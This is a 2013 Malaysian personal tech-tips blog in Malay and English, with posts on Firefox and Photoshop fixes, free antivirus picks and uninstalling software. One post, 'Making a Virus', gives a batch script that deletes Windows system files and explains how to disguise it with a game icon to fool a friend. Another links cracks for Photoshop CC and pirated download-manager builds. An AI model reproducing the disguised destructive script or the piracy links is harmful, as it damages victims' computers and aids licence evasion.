Ahad, 15 September 2013

Well,this is embarrassing. Firefox is having trouble recovering your Windows and tabs. This is usually caused by a recently opened web page. {FIXED}

What to do when you are having this problem?


1.Go to Firefox Search Bar and type in  about:config
2.If there is a pop up,just say OK.
3.There will be list of many codes,just search 
browser.sessionstore.resume_from_crash
4.At right,you will see the boolian as FALSE.Change it to TRUE
by right clicking and RESET.

If this problem is still happening and another Mozilla Crash Report comes 
out,there another method.

1.Go to your Firefox icon/shortcut.
2.Right click > PROPERTIES
3.A pop up comes out and go to COMPATIBILITY
4.Down below you will see a check box,check the "Run As Admin"
5.Apply.

This method should be done everytime updating Firefox.So,you better update 
it now!

Visit/Join HACKERS CAP AYAM  to share knowledge and ask questions!

Selasa, 13 Ogos 2013

Photoshop CC only black and white color problem [FIXED]

Hello everyone!
I was going around Photoshop CC when suddenly this problem appears.


I was only able to use the color Black and White and no other!
This is how I fixed it.

1.Find your Photoshop file.



2.Right after clicking it, hold ALT + CTRL + SHIFT as fast as you could.This will appear.



3. Click 'YES' This will reset all your settings until it looks like new.This is the only way to fiz it.Hope this helps you!~

Adobe Photoshop CC FREE!




Hello!


Today I am going to suggest you some video and link that provides link for Adobe Photoshop CC Cracks.Patching/cracking Adobe Photoshop CC is now tricky because it is now connected to CC (Creative Cloud)

Before any of the instructions,please visit Adobe's website to download Creative Cloud.Without this,you cannot download it.


Creative Cloud

After that,download Photoshop CC first! It may take a while.


Next, use one of these links as patch.

1. By TheMrExus on Youtube
 - http://adf.ly/TvHNJ

2. Full video Tutorial + Link by iKraZeeTV - http://adf.ly/TvJ1Z


Both of them are tested by me and works well.Please tell me in the comments if there is more!































Isnin, 29 Julai 2013

Internet Download Manager LATEST VERSION (6.17 Build 6)

Here are some links for the "Internet Download Manager LATEST VERSION (6.17 Build 6)"




Uploaded by mastersharefiles.blogspot.com - http://adf.ly/T4HfV   (support the owner)

Video and download link by Free Store Program - http://www.youtube.com/watch?v=lYjyTkY_tAo


If there is more links,please add in the comments below or contact at HCA 

Sabtu, 20 Julai 2013

Cara Sekat, Block Pop-Up, Ads

              Assalamualaikum semua,terima kasih melawat blog saya dan maaflah kerana jarang update blog kerana kekurangan masa,okey kita terus dengan perkongsian yang bermanfaat ini,apa yang bermanfaatnya?hehe ok saya nak share satu software nie yang dapat sekat Pop-Up atau Ads killer yang keluar iklan ntah apa2 tue bila anda layari laman web,semak kan bila klik jea laman web yang kita nak terus jer keluar satu lagi laman web berunsurkan iklan dan sebagainya malah lebih parah lagi jika iklan itu berbentuk lucah,iklan produk2 seks yang melampau batas iklan..haaa parah nie,mesti risau kan jika anak2 kita ker yang lihat iklan tue,tambah plak sekarang bulan puasa,okey selain tue software nie jugak dapat membantu kita dalam perlindungan malware,link phishing dan banyak lagi la.
              Yang penting software tersebut dapat mempercepatkan loading page yang kita layari kerana tiada lagi ads,pop-up loading yang semestinya mengurangkan kelajuan loading sesebuah laman web yang kita layari.

             Okeylah cerita panjang2 tak best la, korang mesti x larat baca kan,korang test sendiri la software nie baru taw power kea tak
Boleh klik disini untuk maklumat lanjut.

Nak Download terus software nie boleh klik Disini   

Selamat mencuba okey,semoga bermanfaat kepada pembaca Blog,Terima Kasih jumpa lagii !! :) 

Sedikit Preview Software nie





Selasa, 19 Februari 2013

Membuat Virus / Making a Virus


ENGLISH TRANSLATION BELOW


Di bawah ini merupakan tutorial membuat virus yang boleh men-delete file-file system di dalam PC/Laptop anda. Jadi segala tutorial di bawah ini tidak di tanggung oleh pihak kami. Harap maklum. Jika anda ingin mempelajari juga, sebaiknya janganlah men-click ataupun haruslah running di VMWareterlebih dahulu.


CARA - CARA :1) Buka Notepad.


2) Copy code di bawah :


@echo offdel "c:\windows\pchealth"del "c:\windows\system"del "c:\windows\system32\restore"del "c:\windows\system32\autoexec.nt"del "c:\windows\system32\ntoskrni.exe"del "c:\winlogon.exe"


3) Paste dalam Notepad.


4) Save As kepada fileanda.bat . Jadikan Save As Type: kepada All Files. Namakan fileanda diikuti dengan 2 digit nombor. Contoh, Fifa 10.bat


Tukar Icon File (Step ini nak buat tak apa, tak mahu buat pun tak apa)


5) Click kanan pada fileanda.bat > Create Shortcut . Terbina satu lagi fileanda di desktop.


6) Click kanan > Properties > Change Icon > tukarlah kepada icon mana yang anda mahu. Contoh saya menukarnya kepada icon Fifa 10.


____________________________________________________________________________________________________________

This is a tutorial on how to make a virus that can delete files in your/others system in yours/theirs PC or laptop.So,if anything happens please don't blame us,you've been warned.It's better if you don't click anything.You can run VMW first if you REALLY want to test it by yourself. 1) Open up Notepad. 2) Copy these codes :

@echo offdel "c:\windows\pchealth"del "c:\windows\system"del "c:\windows\system32\restore"del "c:\windows\system32\autoexec.nt"del "c:\windows\system32\ntoskrni.exe"del "c:\winlogon.exe"

3) Paste on Notepad 4) Save as a .bat extension (eg; poops.bat) Remember to choose ALL FILES and your file must be followed by two digits (final eg; poops 12.bat)
5)You can change the icon if you want(troll a friend)

How to change it?

Right click on poops12.bat > Create Shortcut and a file appears on your desktop.
Right click on the virus you made (DON'T CLICK) > Properties > Change Icon
Change to anything that you want.

Good luck!



Ahad, 10 Februari 2013

Shutdown Komputer Automatically


Ada banyak cara,cara menggunakan Windows pun ada.Tapi cara tersebut terlalu berisiko,kadang2 orang tak boleh hentikan Scheduler tu.Jadi,Aroe ada jumpa software yg paling simple n sesuai.Kalau ada lagi,bgtau kat komen nanti Aroe tambah.Anyways,ini timer untuk shutdown komputer kita automatically.Awesomee!





Direct download lagi elok dan untuk pengetahuna semua,install bende ni tak sampai 5 minit~

Checkout HCA group for more help >>>

http://adf.ly/It3QQ

Best FREE Antiviruses [My own Compilation]


(If you don't understand this article,you may click the links only or checkout HCA group so you can ask anyone)


Assalamualaikum semua....
Antivirus yg akan Aroe bgtau ni,ada beberapa yg pernah Aroe pakai ada yg tak pernah.Tapi jangan risau,semua antivirus ni dah Aroe tgk daripada PC/Lappy kawan2.Jadi semua link di bawah adalah selamat!
Kalau tgh malas baca,pergi terus je ke bawah sekali dan terus guna link :D

First,kenalah tau apa antivirus ni...
Dalam kata singkat,antivirus ni yg melindungi komputer anda.
Ada banyak jugak link antivirus di Wikipedia.


Avira
-Avira ni salah satu antivirus paling terkenal dalam internet dan boleh dipercayai walaupun ia Free.Mak saya masih menggunakan Avira dalam lappy beliau dan sampai sekarang masih ok je.Tapi kadang ia agak mengganggu sebab kekadang dia ada keluar bende kat bawah screen (berhampiran jam) dia bukan spam tetapi agak menggagu la.



Microsoft Security Essentials
-Selalunya bende2 yang keluar daripada Microsoft ni kita akan percaya dan yakin dgn kualiti diorang sebab kita kan pengguna Windows.Walau bagaimanapun,MSE ni scan perlahan tapi macam selalu la,sangat meyakinkan.But overall mmg nice.
(Yang untuk Windows 8 bayar)
Kalau anda nak tahu bit komputer anda sama ada 64-bit atau 32-bit,pergi link ni
Download Link : (kena tahu -bit dulu)


Panda Cloud Antivirus
-PCA ni jarang kita dengar.Tapi ni sebenarnya antivirus yg bagus jugak terutamanya untuk malwares.Walaupun tak setanding dengan antivirus yg lain,PCA mmg okayy!!
Tengoklah perbezaan antara yg FREE dgn bayar (trial).Yg free edition bukan trial,don't worry maa..


Comodo Antivirus
-Comodo Antivirus ni pun tak terkenal sangat.Kelemahannya antivirus ni bukan untuk "busniness use" tapi untuk Home boleh maksudnya kiat boleh guna free la!!
Banyak review jugak mengatakan ni salah satu antivirus yg 100% effective.Jomla cuba!
(Ambil download sebelah kanan)
Download Link and Website Link : http://antivirus.comodo.com/


Immunet
-Immunet ni banyak orang dengar jugak.Banyak orang percaya antivirus ni dan dikatakan ni salah satu antivirus yang TIDAK akan memberatkan (melambatkan) komputer.

LavaSoft Ad-Aware
-Ni termasuk antivirus terkenal jugak.Antivirus ni masuk dalam senarai antivirus terbaik di digitaltrends.com.Di laman webnya pun dikatakan dah banyak orang pakai.Aroe tak pernah cuba lagi yg ni tapi menurut semua review,ini free!


AVG Antivirus
-AVG ni sangat terkenal jugak tapi sayangnya yg free kurang lengkap.Tapi,saya sendiri dah try dan mungkin kawan2 lain pun dah try.AVG ni masuk dalam kategori "Boleh Tahan" sebagai salah satu antivirus yg free.AVG juga menjadi antivirus top 'award winning'


Malwarebytes
-Ini yang terakhir dan termasuk dalam golongan yang terbaik.MB ni dah banyak orang2 recomend,mudah digunakan dan selamat.MB selalu masuk dalam senarai Antivirus (Top 10).


Kesimpulannya,Aroe cadangkan semua kawan2 guna Microsoft Security Essentials sebab free dan meyakinkan.Untuk daily drive check,guna Malwarebytes.Walaupun Aroe guna Kaspersky skrg ni,tapi Aroe dulu pun pernah guna semua Antivirus ni.HAAHAH! Enjoyyy!

Checkout HCA group for more help >>> http://adf.ly/It3QQ

Tak Boleh Padam File


Selalu kita download banyak benda pastu lupa nak delete.Ok.Ini adalah Tutorial cara efektif nak padam semua benda tu dari komputer kita.

Pergi ke Start > Control Panel > Programs > Uninstall A Program.Cari file yg nak padam,contoh SpeedFan.Kalau dah jumpa,double click.Dia cakap dah uninstall tapi sebenarnya belum....Ada file yg kita kena siasat dulu.Mesti korang faham,ada beberapa software yg bagi Toolbar and Searchbar masa kita install.

1.Cari File Yg nak/dah Uninstall

Lepas dah taknak guna file tuh,ingat2 masa Install file letak mana.Selalunya secara automatik akan masuk ke Computer > C: > Program Files atau Program Files x86

Cek di salah satu file tu dan contoh file yang nak padam SpeedFan.Cari file SpeedFan dan click.

Sesetengah software sediakan UNINSTALL.exe dan korang boleh terus padam.Tapi ada yg tak.Oleh itu,padam terus file tu.Kalau korang prasan,ada beberapa file lama korang kat situ padamla.Sebenarnya semua benda tu tak guna dah tapi kena slalu hati2 sebab nanti TERPadam benda penting.

2.Cari di Desktop

Walaupun takleh guna dah,tapi mende tuh akan menyemakkan Desktop.Jadi,delete shortcut tu.

3.Cek bar bawah (Sebelah Jam)
Benda ni slalu jadi,cek di bar bawah dan tengok APP tu masih pakai atau tak.Kalau masa padam dia ada bagi message untuk "TryAgain" ni lah penyelesaiannya.

4.Cek START bar.
Kalau masih nampak file tuh kat START,right-click,remove from this list.

Check group HCA >>> http://adf.ly/It3QQ